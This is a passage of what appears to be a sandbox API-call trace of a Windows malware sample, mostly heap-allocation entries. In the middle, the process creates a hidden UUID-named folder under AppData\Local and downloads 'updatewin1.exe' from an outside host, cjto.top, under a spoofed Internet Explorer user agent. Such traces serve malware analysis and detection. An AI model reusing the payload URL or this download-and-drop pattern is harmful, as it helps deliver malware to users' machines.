(HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a35528 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x35eb910 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a35db0 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a36638 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a3dca0 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a3e4e8 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a3ed50 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a36ec0 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a37748 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a3f5b8 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a3fe00 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a37fd0 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a38858 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a390e0 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a39968 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a3a1f0 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a40660 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a40ee8 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a41770 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a41ff8 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a42880 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a50648 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a50eb0 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a43108 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a43990 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a44218 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a51718 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a51f60 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a44aa0 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a45328 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a45bb0 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a46438 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a46cc0 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a47548 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a47dd0 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a48658 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a48ee0 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a527a8 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a53010 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a49768 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a49ff0 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a4a878 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a53878 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a4b100 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a4b988 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a4c210 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a4ca98 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a4d320 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a4dba8 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a4e430 [0160.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a4ecb8 [0160.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a4f540 [0160.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a81fc8 [0160.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a540c0 [0160.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a54928 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a82850 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a830d8 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a83960 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a841e8 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a84a70 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a852f8 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a85b80 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a86408 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a86c90 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x3558850 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a87518 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a55190 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a559a8 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a87da0 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a88628 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a88eb0 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a89738 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a89fc0 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39dce0 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8a848 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8b0d0 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8b958 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8c1e0 [0160.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x110) returned 0x312818 [0160.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x35e8060, dwCreationFlags=0x0, lpThreadId=0x39f2648 | out: lpThreadId=0x39f2648*=0xab0) returned 0x348 [0160.789] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0xaa4) returned 0x344 [0160.789] GetMessageW (lpMsg=0x18dfa0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 82 os_tid = 0x618 Thread: id = 83 os_tid = 0x310 Thread: id = 84 os_tid = 0x9b0 Thread: id = 85 os_tid = 0x34c Thread: id = 86 os_tid = 0x878 Thread: id = 87 os_tid = 0x9f0 Thread: id = 88 os_tid = 0xa88 Thread: id = 89 os_tid = 0x72c Thread: id = 90 os_tid = 0x748 Thread: id = 100 os_tid = 0x930 [0157.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x110) returned 0x312700 [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x110) returned 0x312818 [0157.245] GetLastError () returned 0x54f [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x3a0a3d0 [0157.245] GetCurrentThreadId () returned 0x930 [0157.245] SetLastError (dwErrCode=0x54f) [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3546e68 [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x3573180 [0157.245] GetLastError () returned 0x54f [0157.245] SetLastError (dwErrCode=0x54f) [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3546eb0 [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x35792f0 [0157.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3573180 | out: hHeap=0x2c0000) returned 1 [0157.245] GetLastError () returned 0x54f [0157.245] SetLastError (dwErrCode=0x54f) [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x35791d8 [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x48) returned 0x3570050 [0157.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35792f0 | out: hHeap=0x2c0000) returned 1 [0157.245] GetLastError () returned 0x54f [0157.245] SetLastError (dwErrCode=0x54f) [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x35792f0 [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39d9a0 [0157.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3570050 | out: hHeap=0x2c0000) returned 1 [0157.245] GetLastError () returned 0x54f [0157.245] SetLastError (dwErrCode=0x54f) [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3579210 [0157.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x30e920 [0157.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x39d9a0 | out: hHeap=0x2c0000) returned 1 [0157.245] GetLastError () returned 0x54f [0157.246] SetLastError (dwErrCode=0x54f) [0157.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3579328 [0157.246] GetLastError () returned 0x54f [0157.246] SetLastError (dwErrCode=0x54f) [0157.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312818 | out: hHeap=0x2c0000) returned 1 [0157.246] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0157.250] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0157.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x400) returned 0x3a0a798 [0157.250] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3a0a798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0157.250] UuidCreate (in: Uuid=0x9ffd768 | out: Uuid=0x9ffd768) returned 0x0 [0157.260] UuidToStringA (in: Uuid=0x9ffd768, StringUuid=0x9ffd6c0 | out: StringUuid=0x9ffd6c0) returned 0x0 [0157.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x35792b8 [0157.260] RpcStringFreeA (in: String=0x9ffd6c0 | out: String=0x9ffd6c0) returned 0x0 [0157.260] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="4af56985-47a6-4393-a1ba-5c1d6d073033" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033") returned 1 [0157.260] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033"), lpSecurityAttributes=0x0) returned 1 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x410) returned 0x3a0aba0 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x410) returned 0x3a0afb8 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1000) returned 0x3a0b3d0 [0157.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a0afb8, cbMultiByte=-1, lpWideCharStr=0x3a0b3d0, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033") returned 81 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1010) returned 0x3a0c3d8 [0157.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0b3d0 | out: hHeap=0x2c0000) returned 1 [0157.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0afb8 | out: hHeap=0x2c0000) returned 1 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x3573140 [0157.261] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3547018 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3a0afb8 [0157.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3547018, cbMultiByte=-1, lpWideCharStr=0x3a0afb8, cchWideChar=1072 | out: lpWideCharStr="http://cjto.top/files/penelop/updatewin1.exe") returned 45 [0157.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3a0b820 [0157.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0afb8 | out: hHeap=0x2c0000) returned 1 [0157.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3547018 | out: hHeap=0x2c0000) returned 1 [0157.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x35e0f98 [0157.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a0afb8 [0157.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://cjto.top/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x3a0afb8, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://cjto.top/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0157.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x35e1810 [0157.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a0afb8 | out: hHeap=0x2c0000) returned 1 [0157.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e0f98 | out: hHeap=0x2c0000) returned 1 [0157.262] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://cjto.top/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0160.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35e1810 | out: hHeap=0x2c0000) returned 1 [0160.350] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9ffd6d0, lpdwBufferLength=0x9ffd710, lpdwIndex=0x0 | out: lpBuffer=0x9ffd6d0*, lpdwBufferLength=0x9ffd710*=0x4, lpdwIndex=0x0) returned 1 [0160.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3547138 [0160.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3578db8 [0160.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3547138 | out: hHeap=0x2c0000) returned 1 [0160.350] lstrcpyA (in: lpString1=0x3a0a798, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033" [0160.350] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe") returned 1 [0160.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x39dad8 [0160.350] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b8 [0160.351] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.351] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.516] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.517] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.517] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.517] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.518] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.518] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.518] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.779] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.779] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.779] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.780] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.780] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.780] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.780] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.781] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0160.781] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0160.781] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.099] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.099] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.099] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.100] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.100] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.100] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.101] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.102] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9ffd6dc, lpOverlapped=0x0 | out: lpBuffer=0x9ffd778*, lpNumberOfBytesWritten=0x9ffd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0161.102] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9ffd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9ffd6d8 | out: lpBuffer=0x9ffd778*, lpdwNumberOfBytesRead=0x9ffd6d8*=0x2800) returned 1 [0161.102] WriteFile (in: hFile=0x5b8, lpBuffer=0x9ffd778*, nNumberOfBytesToWrite=0x2800, 